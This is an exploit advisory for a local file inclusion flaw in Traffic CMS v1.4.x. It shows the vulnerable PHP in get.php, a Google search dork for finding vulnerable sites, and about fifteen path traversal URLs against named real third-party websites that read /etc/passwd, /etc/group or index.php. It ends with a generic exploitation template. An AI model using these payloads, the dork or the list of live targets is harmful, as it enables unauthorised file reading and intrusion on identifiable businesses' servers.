Traffic CMS version 1.4.x suffers from a local file inclusion vulnerability.
624c98b778717d19759cfb903dc4a9bfd8c1114710a9bd101578150c371516af
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Traffic CMS v1.4.x => Local File Inclusion Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : https://milw00rm.com - https://h4x0resec.blogspot.com
[~] Þeker Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, d4rkvisuaL, BlackEdition
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs, LordERROR
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Traffic CMS
|~Affected Version : v1.4.x
|~Software : https://www.trafficwebsites.co.uk/ - https://www.facebook.com/trafficwebsites
|~RISK : Medium
|~Google Keyword : inurl:/admin/media/get.php ( developable )
|~Tested On : [L] Kali Linux \ [R] Example sites
#################### INFO ################################
makes it possible to read all the files from the local base.
#######################################################
### Error Line in 'get.php' ##
<?php
$ssl = true;
$file = $_GET['f'];
$path = UL_PATH;
$docs = array('doc','docx','xls','xlsx','pdf','zip','txt','rtf','ppt','pptx');
if (file_exists($path.$file))
{
$size = filesize($path.$file);
$contents = file_get_contents($path.$file);
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo,$path.$file);
finfo_close($finfo);
if(in_array(file_ext($file), $docs))
..
########################################################
Tested on;
https://www.uha.london/admin/media/get.php?f=../../etc/group
https://www.unlimitedshop.co.uk/admin/media/get.php?f=../../etc/group
https://www.unlimitedshop.co.uk/admin/media/get.php?f=../index.php ()
https://www.ticktockrobot.co.uk/admin/media/get.php?f=../../etc/group
https://www.powerelectricservices.co.uk//admin/media/get.php?f=../../etc/group
https://www.knighthoodcorporate.com/admin/media/get.php?f=../../etc/group
https://www.nexusdp.co.uk/admin/media/get.php?f=../../etc/group
https://www.thespencepractice.co.uk/admin/media/get.php?f=../../etc/group
https://www.brightwell.fr/admin/media/get.php?f=../../../../../etc/passwd
https://www.brightwell.co.uk/admin/media/get.php?f=../../../../../etc/passwd
https://brightwell.es/admin/media/get.php?f=../../../../../etc/passwd
https://www.brightwell-inc.com/admin/media/get.php?f=../../../../../etc/passwd
https://www.talbottype.co.uk/admin/media/get.php?f=../../../../../etc/passwd
https://www.talbottype.co.uk/admin/media/get.php?f=../index.php
https://www.weddinginateacup.co.uk/admin/media/get.php?f=../../../etc/group
############################################################
Exploitation; https://$VICTIM/admin/media/get.php?f=[Local Path]
############################################################